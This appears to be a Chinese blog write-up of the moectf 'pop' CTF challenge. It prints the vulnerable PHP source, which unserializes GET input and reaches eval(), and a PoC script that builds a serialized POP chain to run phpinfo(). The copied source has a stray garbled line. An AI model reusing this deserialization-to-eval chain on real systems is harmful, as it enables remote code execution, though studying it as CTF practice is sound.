moectf-pop

moectf-pop


将近半年没有接触反序列化,上手竟觉得如此生疏,贴一下原题和poc


原题


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
<?php

class class000 {
ni



    public function __destruct()
    {
        $this->check();
    }

    public function check()
    {
        if($this->payl0ad === 0)
        {
            die('FAILED TO ATTACK');
        }
        $a = $this->what;
        $a();
    }
}

class class001 {
    public $payl0ad;
    public $a;
    public function __invoke()
    {
        $this->a->payload = $this->payl0ad;
    }
}

class class002 {
    private $sec;
    public function __set($a, $b)
    {
        $this->$b($this->sec);
    }
    public function dangerous($whaattt)
    {
        $whaattt->evvval($this->sec);
    }

}

class class003 {
    public $mystr;
    public function evvval($str)
    {
        eval($str);
    }

    public function __tostring()
    {
        return $this->mystr;
    }
}

if(isset($_GET['data']))
{
    $a = unserialize($_GET['data']);
}
else {
    highlight_file(__FILE__);
}

Poc


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php

class class000 {
    private $payl0ad=1;
    public $what='class001';


}

class class001 {
    public $payl0ad='echo';
    public $a;

}

class class002 {
    public $sec;


}

class class003 {
    public $mystr;

}

$x=new class000;
$y=new class001;
$z=new class002;
$p=new class003;

$x->what = $y;
$y->a=$z;
$y->payl0ad='dangerous';
$z->sec=$p;
$p->mystr='phpinfo();';

echo urlencode(serialize($x));
?>

这里特别注意一下因为eval函数执行的是php命令,记得带上”;”


写在后面


最近心情是真的低落,有点回到疫情的时候的感觉了。去年夏天的阴影还是没法缓解,每每想起就害怕得想哭。估计是呆在家里太久,把人闷出事了。希望能赶快调整回来